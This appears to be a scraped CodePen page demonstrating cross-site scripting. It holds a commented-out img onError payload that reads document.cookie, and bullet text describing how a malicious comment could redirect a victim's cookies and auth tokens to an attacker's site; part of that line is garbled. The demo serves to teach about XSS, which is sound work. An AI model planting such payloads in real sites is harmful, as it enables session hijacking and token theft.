Pen Settings



CSS Base

Vendor Prefixing

Add External Stylesheets/Pens

Any URL's added here will be added as <link>s in order, and before the CSS in the editor. You can use the CSS from another Pen by using it's URL and the proper URL extention.

+ add another resource


Babel includes JSX processing.

Add External Scripts/Pens

Any URL's added here will be added as <script>s in order, and run before the JavaScript in the editor. You can use the URL of any other Pen and it will include the JavaScript from that Pen.

+ add another resource


Add Packages

Search for and use JavaScript packages from npm here. By selecting a package, an import statement will be added to the top of the JavaScript editor for this package.


Save Automatically?

If active, Pens will autosave every 30 seconds after being saved once.

Auto-Updating Preview

If enabled, the preview panel updates automatically as you code. If disabled, use the "Run" button to update.

Format on Save

If enabled, your code will be formatted when you actively save your Pen. Note: your code becomes un-folded during formatting.

Editor Settings

Code Indentation

Want to change your Syntax Highlighting theme, Fonts and more?

Visit your global Editor Settings.


    Welcome <span class="username">user</span>
  <li>Comment the first username and uncomment the second username.</li>
  <li>The second username has an invalid image, since it's invalid image, the onError event is fired, and now the attack has control over your browser page.</li>
<li>How can this damage me ? Imagine this is a comment in a E-commerce website The E-commerce website uses token authentification by cookies.</li>
  <li>The attacker can send your cookies (including your tokens) to a malicious website (onError="window.location.replace(""</li> + document.cookie);")
  <li>The attacker can either perform an action off your behalf (see:</li>
    <li>A lot of different way of retrieving informations are available to the attacker.</li>




                document.cookie = "secretToken=the cake is a lie";

var username = 'non malicious john doe';
// var username = '<img onError="alert(document.cookie)" style="display:none" src="invalidPath">malicious john doe';